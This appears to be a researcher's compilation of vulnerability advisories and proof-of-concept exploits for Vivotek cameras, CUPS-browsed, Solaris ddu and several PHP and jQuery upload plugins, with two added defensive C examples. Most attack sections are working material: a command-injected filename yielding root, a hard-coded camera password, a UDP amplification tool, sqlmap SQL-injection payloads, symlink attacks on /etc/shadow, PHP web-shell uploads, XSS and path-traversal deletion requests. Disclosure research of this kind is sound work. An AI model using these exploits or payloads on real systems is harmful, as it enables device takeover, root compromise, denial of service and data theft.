Improper Neutralization of Special Elements used in a Command ('Command Injection') vulnerability in Vivotek firmware modules allows OS command injection. Affected device models: FD8365, FD8365v2, FD9165, FD9171, FD9187, FD9189, FD9365, FD9371, FD9381, FD9387, FD9389, FD9391, FE9180, FE9181, FE9191, FE9381, FE9382, FE9391, FE9582, IB9365, IB93587LPR, IB9371, IB9381, IB9387, IB9389, IB939, IP9165, IP9171, IP9172, IP9181, IP9191, IT9389, MA9321, MA9322, MS9321, MS9390, TB9330. Affected firmware versions: 0100a, 0106a, 0106b, 0107a, 0107b_1, 0109a, 0112a, 0113a, 0113d, 0117b, 0119e, 0120b, 0121, 0121d, 0121d_48573_1, 0122e, 0124d_48573_1, 012501, 012502, 0125c.
Because we were unable to obtain the specific model of camera ourselves, we configured a machine to emulate the architecture and environment of a vulnerable camera.
The following criteria need to be met in order to exploit the vulnerability:
The file size must be under 5MB.
The calling script must be upload_map.cgi, not file_manager.cgi; file_manager.cgi can't be accessed directly, as the code checks for this, which I will highlight below.
The uploaded binary must pass a firmware verification check.
The /usr/sbin/confclient binary must be intact and return the following string: capability_remotecamctrl_master=1
The boa web server included in the firmware is customized and uses non-standard environment variables to pass data to cgi-bin binaries.
#!/bin/bash
TEMP_DIR=/tmp
# Create a minimal firmware file
# The validate_firmware_file checks for magic bytes: FF V FF FF (at start) and FF K FF FF (at end)
echo "[*] Creating test firmware file..."
# Create fake firmware with proper magic bytes
FIRMWARE_FILE="$TEMP_DIR/firmware.bin"
# Write the magic header: FF V FF FF
printf '\xFF\x56\xFF\xFF' > "$FIRMWARE_FILE"
# Add padding and fake firmware data
dd if=/dev/zero bs=1 count=1000 >> "$FIRMWARE_FILE" 2>/dev/null
# Write the magic footer: FF K FF FF
printf '\xFF\x4B\xFF\xFF' >> "$FIRMWARE_FILE"
echo "[+] Firmware file created: $FIRMWARE_FILE"
ls -lh "$FIRMWARE_FILE"
echo ""
Bash script used to create valid dummy firmware images.
The CONTENT_LENGTH value just needs to be above 0 and below 5MB.
export REQUEST_METHOD=POST
export CONTENT_LENGTH=55123
export QUERY_STRING=camid=1
export SCRIPT_NAME=upload_map.cgi
export POST_FILE_NAME="test_firmware.bin;id;"
The environment variables used to execute the cgi-bin binary.
# /usr/share/www/cgi-bin/upload_map.cgi
Content-type: text/html
<html>
<head>
<meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><script type='text/javascript' src='/include/common.js'></script>
</head>
<body>upload_result='0';upload_msg='upload_successfully';ip='';port='0';username='';passwd='';</body></html>mv: missing destination file operand after 'test_firmware.bin'
Try 'mv --help' for more information.
uid=0(root) gid=0(root) groups=0(root)
The resulting output of id being passed into the system() function.
[pid 360278] execve("/bin/sh", ["sh", "-c", "mv test_firmware.bin;id; /mnt/fl"...], 0x555587d277c0 /* 22 vars */ <unfinished ...>
[pid 360279] <... clock_nanosleep resumed> <unfinished ...>) = ?
[pid 360279] +++ exited with 0 +++
[pid 360278] <... execve resumed>) = 0
[pid 360278] newfstatat(AT_FDCWD, "/usr/bin/mv", {st_mode=S_IFREG|0755, st_size=137752, ...}, 0) = 0
[pid 360278] rt_sigprocmask(SIG_SETMASK, ~[RTMIN RT_1], NULL, 8) = 0
[pid 360278] vfork(strace: Process 360280 attached
<unfinished ...>
[pid 360280] rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
[pid 360280] execve("/usr/bin/mv", ["mv", "test_firmware.bin"], 0x60c637838788 /* 22 vars */ <unfinished ...>
[pid 360278] <... vfork resumed>) = 360280
.
.
.
[pid 360280] write(2, "mv: ", 4mv: ) = 4
[pid 360280] write(2, "missing destination file operand"..., 58missing destination file operand after 'test_firmware.bin') = 58
[pid 360280] write(2, "\n", 1
) = 1
[pid 360280] write(2, "Try 'mv --help' for more informa"..., 38Try 'mv --help' for more information.
) = 38
[pid 360281] rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
[pid 360281] execve("/usr/bin/id", ["id"], 0x60c637838788 /* 22 vars */ <unfinished ...>
[pid 360278] <... vfork resumed>) = 360281
[pid 360278] rt_sigprocmask(SIG_SETMASK, [], ~[KILL STOP RTMIN RT_1], 8) = 0
[pid 360278] wait4(-1, <unfinished ...>
[pid 360281] <... execve resumed>) = 0
.
.
.
[pid 360281] close(4) = 0
[pid 360281] write(1, "uid=0(root) gid=0(root) groups=0"..., 39uid=0(root) gid=0(root) groups=0(root)
) = 39
snprintf() is used to format the string "mv %s %s" with user-supplied input, and that string is then passed to the system() function. This is where the command injection occurs. By supplying a specially crafted filename with shell commands embedded in it, we can execute commands as the HTTP server's user ID, which is root.
0x00009a84 e4109fe5 ldr r1, [0x00009b70] ; [0x9b70:4]=511
0x00009a88 e4209fe5 ldr r2, str.mv__s__s ; [0xc348:4]=0x2520766d ; "mv %s %s"
0x00009a8c 00308de5 str r3, [sp]
0x00009a90 de0f8de2 add r0, var_378h
0x00009a94 0930a0e1 mov r3, sb ; 0xc44c ; "POST_FILE_NAME"
0x00009a98 effbffeb bl sym.imp.snprintf
0x00009a9c de0f8de2 add r0, var_378h
0x00009aa0 05fcffeb bl sym.imp.system
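As an added illustration, not code from the Vivotek firmware or from this advisory, the C below places the "mv %s %s" + system() pattern next to a replacement that validates the upload name against an allowlist and moves the file without ever involving a shell. The function names, the source and destination directories (/tmp and /var/uploads) and the 64-character length bound are assumptions made for this example; build_mv_command only constructs the command string so the reader can see what the shell would have received, and never executes it.

```c
/* Added example: the snprintf("mv %s %s") + system() pattern and a
 * shell-free replacement. Not the camera firmware's code; function names,
 * directories and limits are assumptions for illustration. */
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef PATH_MAX
#define PATH_MAX 4096
#endif

/* Vulnerable pattern, reproduced only up to building the command line:
 * the upload name lands unquoted inside a shell command. system() is
 * deliberately not called here. */
int build_mv_command(char *out, size_t outlen, const char *post_file_name,
                     const char *dest_dir)
{
    int n = snprintf(out, outlen, "mv %s %s", post_file_name, dest_dir);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Returns 1 when the command the shell would receive equals expected. */
int command_would_be(const char *post_file_name, const char *dest_dir,
                     const char *expected)
{
    char cmd[512];
    if (build_mv_command(cmd, sizeof cmd, post_file_name, dest_dir) != 0)
        return 0;
    return strcmp(cmd, expected) == 0;
}

/* Allowlist validation: one path component of [A-Za-z0-9._-], not starting
 * with '.' (hidden files, "..") or '-' (looks like an option to mv), bounded
 * length. ';', '|', '`', '$', space, '/' and friends are rejected outright. */
int is_safe_upload_name(const char *name)
{
    size_t len, i;
    if (name == NULL)
        return 0;
    len = strlen(name);
    if (len == 0 || len > 64)
        return 0;
    if (name[0] == '.' || name[0] == '-')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

/* Hardened move: validate, then rename(2) directly. 0 on success, -1 if the
 * name is rejected or a path would not fit, -2 if rename fails (errno set;
 * EXDEV means different filesystems, see move_upload_execv). */
int move_upload_safe(const char *name, const char *src_dir, const char *dest_dir)
{
    char src[PATH_MAX], dst[PATH_MAX];
    if (!is_safe_upload_name(name))
        return -1;
    if (snprintf(src, sizeof src, "%s/%s", src_dir, name) >= (int)sizeof src)
        return -1;
    if (snprintf(dst, sizeof dst, "%s/%s", dest_dir, name) >= (int)sizeof dst)
        return -1;
    return rename(src, dst) == 0 ? 0 : -2;
}

/* When an external mv is genuinely needed (cross-filesystem moves), run it
 * with execv() and an argv array: no shell parses the name, and "--" stops
 * mv from reading it as an option. Same return codes as above. */
int move_upload_execv(const char *name, const char *src_dir, const char *dest_dir)
{
    char src[PATH_MAX], dst[PATH_MAX];
    pid_t pid;
    int status;
    if (!is_safe_upload_name(name))
        return -1;
    if (snprintf(src, sizeof src, "%s/%s", src_dir, name) >= (int)sizeof src)
        return -1;
    if (snprintf(dst, sizeof dst, "%s/%s", dest_dir, name) >= (int)sizeof dst)
        return -1;
    pid = fork();
    if (pid < 0)
        return -2;
    if (pid == 0) {
        char *const argv[] = { "mv", "--", src, dst, NULL };
        execv("/bin/mv", argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0)
        return -2;
    return (WIFEXITED(status) && WEXITSTATUS(status) == 0) ? 0 : -2;
}

int main(void)
{
    /* Constructed sample: the filename seen in the strace output above. */
    const char *evil = "test_firmware.bin;id;";
    char cmd[512];
    build_mv_command(cmd, sizeof cmd, evil, "/var/uploads");
    printf("shell would have received: %s\n", cmd);
    printf("allowlist verdict for '%s': %d\n", evil, is_safe_upload_name(evil));
    printf("move_upload_safe on rejected name: %d\n",
           move_upload_safe(evil, "/tmp", "/var/uploads"));
    return 0;
}
```

The allowlist is the important half: quoting or escaping the name for the shell is fragile, whereas refusing anything outside a small character set and never handing the name to a shell removes the injection class entirely. rename(2) fails with EXDEV when the upload spool and the destination are separate filesystems, which is plausible on a camera (tmpfs to flash), so the execv variant is kept for that case.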
A default password of mpeg4soc was found in firmware for the following camera models (each listed once): FD7131-VVTK, FD7141-VVTK, IP7131-VVTK, IP7133-VVTK, IP7134-VVTK, IP7135-VVTK, IP7137-VVTK, IP7138-VVTK, IP7142-VVTK, IP7151-VVTK, IP7152-VVTK, IP7153-VVTK, IP7154-VVTK, IP7330-VVTK, IP8131-VVTK, IP8131W-VVTK, PT7135-VVTK, PT7137-TCON, PT7137-VVTK, PZ7131-VVTK, PZ71X1-VVTK, PZ71X2-VVTK, SD73X3-VVTK, TC5330-VVTK, TC5332-TCVV, TC5333-TCVV, TC5633-TCVV, TC5633-VVTK, VS7100-VVTK.
There is an unauthenticated remote command injection in /cgi-bin/admin/eventtask.cgi that allows a user to run arbitrary commands on a vulnerable host. The only reference to this endpoint is here: https://archify-images-prod.s3.ap-southeast-1.amazonaws.com/catalog/product_files_other/4b53r-pua2f-1643099534md8563-eh-vvtk-0122a_beta2_release_note.pdf
So I believe it's a duplicate, but I am asking the vendor to confirm.
https://github.com/bsmithbuf/VIVOTEK_CVE_2019_19936
This will check if you're vulnerable:
$ curl -v http://192.168.0.132/cgi-bin/admin/eventtask.cgi
* Trying 192.168.0.132:80...
* Connected to 192.168.0.132 (192.168.0.132) port 80
> GET /cgi-bin/admin/eventtask.cgi HTTP/1.1
> Host: 192.168.0.132
> User-Agent: curl/8.5.0
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Mon, 03 Jan 2000 01:41:09 GMT
< Server: Boa/0.94.14rc21
< Accept-Ranges: bytes
< Connection: close
< Content-type: text/plain
<
Missing parameter
https://archify-images-prod.s3.ap-southeast-1.amazonaws.com/catalog/product_files_other/4b53r-pua2f-1643099534md8563-eh-vvtk-0122a_beta2_release_note.pdf
The problem arises when an attacker sends a crafted packet specifying the address of a target as a printer to be added. For each packet sent, the vulnerable CUPS server will generate a larger and partially attacker-controlled IPP/HTTP request directed at the specified target. As a result, not only is the target affected, but the host of the CUPS server also becomes a victim, as the attack consumes its network bandwidth and CPU resources.
// Larry Cashdollar Akamai SIRT
// Testing amplification and reflection vector of Evilsocket's CUPS vulnerability
// https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>

void send_browsed_packet(const char *ip, int port, const char *ipp_server_host, int ipp_server_port, const char *payload) {
    printf("Sending UDP Payload to target %s and port %d\n", ipp_server_host, ipp_server_port);
    int printer_type = 0x00;
    int printer_state = 0x03;
    char printer_uri[256];
    snprintf(printer_uri, sizeof(printer_uri), "http://%s:%d/printers/%s", ipp_server_host, ipp_server_port, payload);
    const char *printer_location = "Office HQ";
    const char *printer_info = "Printer";
    char message[512];
    snprintf(message, sizeof(message), "%x %x %s \"%s\" \"%s\"",
             printer_type,
             printer_state,
             printer_uri,
             printer_location,
             printer_info);
    printf("Byte Size: %zu\n", strlen(message));
    int sock;
    struct sockaddr_in server_addr;
    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("Socket creation failed");
        return;
    }
    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(port);
    if (inet_pton(AF_INET, ip, &server_addr.sin_addr) <= 0) {
        perror("Invalid IP address");
        close(sock);
        return;
    }
    sendto(sock, message, strlen(message), 0, (struct sockaddr *)&server_addr, sizeof(server_addr));
    close(sock);
}

int main(int argc, char *argv[]) {
    if (argc < 5) {
        printf("CUPS Browsed Amplification Test PoC script - Larry Cashdollar Akamai.\n");
        printf("Usage: reflector_IP Port target target_port\n");
        return 1;
    }
    const char *reflector = argv[1];
    int ref_port = atoi(argv[2]);
    const char *target = argv[3];
    int tar_port = atoi(argv[4]);
    const char *payload = argv[4];
    send_browsed_packet(reflector, ref_port, target, tar_port, payload);
    return 0;
}
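From the defender's side, as an added example that is not part of Akamai's PoC or of cups-browsed itself: the UDP announcement the PoC builds has the shape "type state uri "location" "info"", and the reflection described above works because cups-browsed will contact whatever host the printer URI names. The C below parses an announcement in that format, pulls the host and port out of the URI, and compares the host against an allowlist of known print servers, which is the check a sensor watching 631/udp could apply to flag announcements that would steer cups-browsed at an arbitrary host. The sample packets, the allowlist (RFC 5737 documentation addresses) and the function names are constructed for this example.

```c
/* Added example: parse a cups-browsed style UDP announcement and check the
 * advertised printer host against an allowlist. Not code from cups-browsed
 * or from the PoC above; packets, allowlist and names are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct browse_announce {
    unsigned int printer_type;
    unsigned int printer_state;
    char uri[256];
    char location[256];
    char info[256];
};

/* Parse "type state uri "location" "info"" exactly as the PoC formats it.
 * Returns 0 on success, -1 if the datagram does not have that shape. */
int parse_browse_announce(const char *msg, struct browse_announce *out)
{
    int n = sscanf(msg, "%x %x %255s \"%255[^\"]\" \"%255[^\"]\"",
                   &out->printer_type, &out->printer_state,
                   out->uri, out->location, out->info);
    return n == 5 ? 0 : -1;
}

/* Extract host and port from scheme://host[:port]/path. Port defaults to
 * 631 (IPP) when absent. Returns 0 on success, -1 on malformed input. */
int uri_host_port(const char *uri, char *host, size_t hostlen, int *port)
{
    const char *p = strstr(uri, "://");
    size_t n;
    if (p == NULL)
        return -1;
    p += 3;
    n = strcspn(p, ":/");
    if (n == 0 || n >= hostlen)
        return -1;
    memcpy(host, p, n);
    host[n] = '\0';
    *port = 631;
    if (p[n] == ':') {
        char *end;
        long v = strtol(p + n + 1, &end, 10);
        if (end == p + n + 1 || v <= 0 || v > 65535)
            return -1;
        *port = (int)v;
    }
    return 0;
}

/* Verdict for one announcement: 1 = host is a known print server,
 * 0 = host is not on the allowlist (cups-browsed would be steered at an
 * arbitrary host), -1 = the datagram or its URI could not be parsed. */
int browse_announce_allowed(const char *msg, const char *const *allowed, size_t n_allowed)
{
    struct browse_announce a;
    char host[256];
    int port;
    size_t i;
    if (parse_browse_announce(msg, &a) != 0)
        return -1;
    if (uri_host_port(a.uri, host, sizeof host, &port) != 0)
        return -1;
    for (i = 0; i < n_allowed; i++)
        if (strcmp(host, allowed[i]) == 0)
            return 1;
    return 0;
}

/* The port cups-browsed would connect to for this announcement, -1 if unparseable. */
int announce_target_port(const char *msg)
{
    struct browse_announce a;
    char host[256];
    int port;
    if (parse_browse_announce(msg, &a) != 0)
        return -1;
    if (uri_host_port(a.uri, host, sizeof host, &port) != 0)
        return -1;
    return port;
}

/* Constructed samples: one announcing a known print server, one pointing
 * cups-browsed at an unrelated host on a non-IPP port. */
static const char *const KNOWN_PRINT_SERVERS[] = { "192.0.2.10" };
static const char *const SAMPLE_OK  = "0 3 http://192.0.2.10:631/printers/office \"Office HQ\" \"Printer\"";
static const char *const SAMPLE_BAD = "0 3 http://203.0.113.7:80/printers/AAAA \"Office HQ\" \"Printer\"";

int main(void)
{
    printf("known server announcement: %d\n",
           browse_announce_allowed(SAMPLE_OK, KNOWN_PRINT_SERVERS, 1));
    printf("unknown host announcement: %d (port %d)\n",
           browse_announce_allowed(SAMPLE_BAD, KNOWN_PRINT_SERVERS, 1),
           announce_target_port(SAMPLE_BAD));
    return 0;
}
```

A verdict of 0 is the signal worth alerting on: a browse announcement whose printer URI points somewhere other than a known print server is exactly what the reflection relies on. The check complements rather than replaces the real mitigations, which are to stop cups-browsed from accepting legacy CUPS browse packets (its BrowseRemoteProtocols setting) and to block 631/udp at the host or network edge.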
https://www.msn.com/en-gb/money/technology/ddos-attacks-can-be-amplified-by-cups-flaw/ar-AA1rItbc
https://www.secureblink.com/cyber-security-news/critical-cups-vulnerability-enables-600x-d-do-s-attack-amplification-1
https://heimdalsecurity.com/blog/cups-vulnerability/
https://www.rewterz.com/threat-advisory/recently-patched-vulnerability-in-cups-allows-ddos-attacks-to-be-amplified
https://www.acaglobal.com/insights/vulnerabilities-discovered-common-unix-printing-system-cups-can-enable-ddos-attacks
https://cyberinsider.com/over-58000-endpoints-vulnerable-to-600x-amplification-attacks/
https://informationsecuritybuzz.com/new-ddos-attack-vector-discovered-cups/
https://www.theregister.com/2024/10/07/critical_cups_vulnerability_chain_easy/
https://it.slashdot.org/story/24/10/05/0413201/akamai-warns-cups-vulnerability-also-brings-new-threat-of-ddos-attacks
https://www.techradar.com/pro/security/ddos-attacks-can-be-amplified-by-cups-flaw
https://www.computerweekly.com/news/366612800/Cups-Linux-printing-bugs-open-door-to-DDoS-attacks-says-Akamai
https://www.teiss.co.uk/news/news-scroller/experts-warn-of-ddos-attacks-exploiting-linux-printing-vulnerabilities-14720
https://www.bleepingcomputer.com/news/security/recently-patched-cups-flaw-can-be-used-to-amplify-ddos-attacks/
https://securityonline.info/cups-exploit-turns-common-devices-into-ddos-weapons/
https://www.msspalert.com/brief/cups-vulnerabilities-could-lead-to-widespread-attacks
https://www.scworld.com/brief/ddos-attacks-possible-with-exploitation-of-cups-vulnerabilities
https://www.helpnetsecurity.com/2024/10/03/cups-vulnerabilities-ddos/
https://www.darkreading.com/vulnerabilities-threats/unix-printing-vulnerabilities-easy-ddos-attacks
https://therecord.media/ddos-attacks-cups-linux-print-vulnerability
https://www.securityweek.com/after-code-execution-researchers-show-how-cups-can-be-abused-for-ddos-attacks/
PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.
curl -vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
nsdb-convert is a script which may be used to convert the contents of an Oracle Solaris 11 format FedFS NSDB to the format supported by the current Oracle Solaris release.
The nsdb-update-nci command marks a distinguished name on an LDAP server as a container for FedFS data by adding the fedfsNsdbContainerInfo object class to the root of the naming context and setting the fedfsNcePrefixR attribute to point to the relative DN from the root of the naming context.
DataTables is a jQuery JavaScript library that converts simple HTML tables into dynamic, feature-rich tables. jQuery DataTables is very user friendly for listing records with live add, edit and delete of records without a page refresh. Because of this, DataTables is widely used in web applications to list records.
$ sqlmap -u "http://192.168.0.149/live-add-edit-delete-datatables-php-mysql-demo/ajax_action.php" --data "draw=153&columns[0][data]=0&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=false&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=5&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=6&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=false&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=7&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=false&columns[7][search][value]=&columns[7][search][regex]=false&order[0][column]=3&order[0][dir]=asc&start=0&length=10&search[value]="+and+"1&search[regex]=false&action=listRecords" -p "search[value]" --method POST --dbms=mysql --level 2 --risk 2
[*] starting at 10:38:51
[10:38:52] [INFO] testing connection to the target URL
[10:38:52] [INFO] testing if the target URL is stable
[10:38:53] [INFO] target URL is stable
[10:38:53] [WARNING] heuristic (basic) test shows that POST parameter 'search[value]' might not be injectable
[10:38:53] [INFO] testing for SQL injection on POST parameter 'search[value]'
[10:38:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:38:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Generic comment)'
[10:38:56] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[10:38:56] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[10:38:56] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:38:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[10:38:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace (original value)'
[10:38:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace'
[10:38:58] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:38:58] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:38:59] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:38:59] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:39:00] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:39:01] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:39:01] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:39:01] [INFO] testing 'MySQL inline queries'
[10:39:01] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[10:39:01] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[10:39:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:39:53] [INFO] POST parameter 'search[value]' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (2) values? [Y/n] y
[10:40:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:40:00] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:40:00] [INFO] target URL appears to be UNION injectable with 6 columns
[10:40:00] [INFO] POST parameter 'search[value]' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search[value]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 203 HTTP(s) requests:
---
Parameter: search[value] (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: draw=153&columns[0][data]=0&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=false&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=5&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=6&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=false&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=7&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=false&columns[7][search][value]=&columns[7][search][regex]=false&order[0][column]=3&order[0][dir]=asc&start=0&length=10&search[value]= and 1") AND (SELECT * FROM (SELECT(SLEEP(5)))KGDc) AND ("Aejs"="Aejs&search[regex]=false&action=listRecords
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: draw=153&columns[0][data]=0&columns[0][name]=&columns[0][searchable]=true&columns[0][orderable]=false&columns[0][search][value]=&columns[0][search][regex]=false&columns[1][data]=1&columns[1][name]=&columns[1][searchable]=true&columns[1][orderable]=true&columns[1][search][value]=&columns[1][search][regex]=false&columns[2][data]=2&columns[2][name]=&columns[2][searchable]=true&columns[2][orderable]=true&columns[2][search][value]=&columns[2][search][regex]=false&columns[3][data]=3&columns[3][name]=&columns[3][searchable]=true&columns[3][orderable]=true&columns[3][search][value]=&columns[3][search][regex]=false&columns[4][data]=4&columns[4][name]=&columns[4][searchable]=true&columns[4][orderable]=true&columns[4][search][value]=&columns[4][search][regex]=false&columns[5][data]=5&columns[5][name]=&columns[5][searchable]=true&columns[5][orderable]=true&columns[5][search][value]=&columns[5][search][regex]=false&columns[6][data]=6&columns[6][name]=&columns[6][searchable]=true&columns[6][orderable]=false&columns[6][search][value]=&columns[6][search][regex]=false&columns[7][data]=7&columns[7][name]=&columns[7][searchable]=true&columns[7][orderable]=false&columns[7][search][value]=&columns[7][search][regex]=false&order[0][column]=3&order[0][dir]=asc&start=0&length=10&search[value]= and 1") UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7162717671,0x5a6b657a455263557478797469434e4f506b596f4e5a585668496b6e7464796e6a6f6a596e656b4e,0x717a767171),NULL-- SkNj&search[regex]=false&action=listRecords
---
[10:40:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[10:40:02] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 31 times
[10:40:02] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.149'
"The Device Driver Utility provides information about the devices on your installed system and the drivers that manage those devices. The DDU reports whether the currently booted operating system has drivers for all of the devices that are detected in your system. If a device does not have a driver attached, the Device Driver Utility recommends a driver package to install."
Tested on Solaris 11 x86:
larry@SolSun:~$ uname -a
SunOS SolSun 5.11 11.4.0.15.0 i86pc i386 i86pc
and OpenIndiana:
root@openindiana:/export/home/larry# uname -a
SunOS openindiana 5.11 illumos-1b500975aa i86pc i386 i86pc
Append content to /etc/passwd:
larry@openindiana:/tmp$ ln -s /etc/passwd ddu_log
To get local root, simply have ddu chmod 666 /etc/shadow:
larry@openindiana:/tmp$ while true; do ln -s /etc/shadow ddu_err.log; done
A better exploit: https://github.com/lcashdol/Exploits/tree/master/ddu-exploit
https://github.com/OpenIndiana/ddu/commit/31dca7f6bee738980ecabefadedd01fcc3f3acf6
https://www.oracle.com/security-alerts/cpujul2020.html#AppendixSUNS
upload-image-with-ajax
$ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php fileUpload
POST request size is 482 bytes
Sending Payload:
POST /upload-image-with-ajax/upload.php HTTP/1.1
Host: 192.168.0.3
User-Agent: File Upload Exploiter/v1.2
Accept: */*
Content-Length: 251
Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853

--------------------------c8e05c8871143853
Content-Disposition: form-data; name="fileUpload"; filename="shell.php"
Content-Type: application/octet-stream

<?php $cmd=$_GET['cmd']; system($cmd);?>
--------------------------c8e05c8871143853--

HTTP/1.1 200 OK
Date: Tue, 24 Dec 2019 12:16:57 GMT
Server: Apache/2.4.25 (Debian)
Vary: Accept-Encoding
Content-Length: 96
Content-Type: text/html; charset=UTF-8

was not an image<br><h2> application/octet-stream</h2>file size is 42<br>upload successful!
[+] Total bytes read: 267
Author fixed vulnerability: https://github.com/abcprintf/upload-image-with-ajax/commit/71436ba5102010397519d4b25ea57591cfb4974c
"Online store system" is a drop in customizable electronic storefront. It has an administrative interface allowing user and product management.
Set login name or email to "><script>alert(1);</script>
$ curl -s cookie.txt -X POST -d "username=jsmith&password=jsmith123&email=\"><script>alert(1);</script>%40email.com" http://example.com/pso/sent_register.php
$ curl -s cookie.txt "http://example.com/pso/admin/delete_file.php?id=0&filename=../women.php"
$ curl -s cookie.txt http://example.com/pso/admin/product_delete.php?id=4
PHP-based server-side example for handling traditional endpoint requests from Fine Uploader
https://github.com/lcashdol/Exploits/tree/master/CVE-2018-9209
Author deleted his software repository instead.
Picture Cut is a jQuery plugin that handles images in a very friendly and simple way, with a beautiful interface based on Bootstrap or jQuery UI, and has great features like ajax upload, dragging an image from the explorer, image crop and others.
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@shell.php" http://example.com/jQuery-Picture-Cut/src/php/upload.php
With folderOnServer=/ the shell will be in the main web directory path.
jQuery Upload File plugin provides multiple file uploads with a progress bar. Works with any server-side platform (Google App Engine, PHP, Python, Ruby on Rails, Java, etc.) that supports standard HTML form file uploads.
$ curl -F "myfile=@shell.php" "http://example.com/jquery-upload-file/php/upload.php"
["shell.php"]
Where shell is https://github.com/lcashdol/shittyshell/blob/master/shittyshell.php
Shell is located at http://example.com/jquery-upload-file/php/uploads/shell.php
